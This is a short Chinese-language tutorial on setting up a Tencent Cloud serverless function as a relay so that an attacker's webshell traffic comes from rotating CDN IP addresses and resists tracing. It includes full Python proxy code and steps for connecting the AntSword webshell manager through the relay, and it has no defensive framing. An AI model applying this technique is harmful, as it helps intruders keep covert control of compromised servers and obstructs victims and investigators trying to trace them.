介绍:
云函数自带CDN,每次请求webshell的时候ip都不同,利用云函数反溯源
正文:
创建云函数
- 登录腾讯云,创建云函数
- 配置创建方式、函数类型、部署方式
- 函数代码,选择在线编辑
代码如下:
# -*- coding: utf8 -*-
import requests
import json
def geturl(urlstr):
jurlstr = json.dumps(urlstr)
dict_url = json.loads(jurlstr)
return dict_url['u']
def main_handler(event, context):
url = geturl(event['queryString'])
postdata = event['body']
headers=event['headers']
resp=requests.post(url,data=postdata,headers=headers,verify=False)
response={
"isBase64Encoded": False,
"statusCode": 200,
"headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},
"body": resp.text
}
return response
代码执行头
配置触发器,点击完成,就创建成功
获取云函数URL,复制访问路径
webshell使用云函数连接
- 云函数+webshell
云函数?u=webshell
使用蚁剑连接、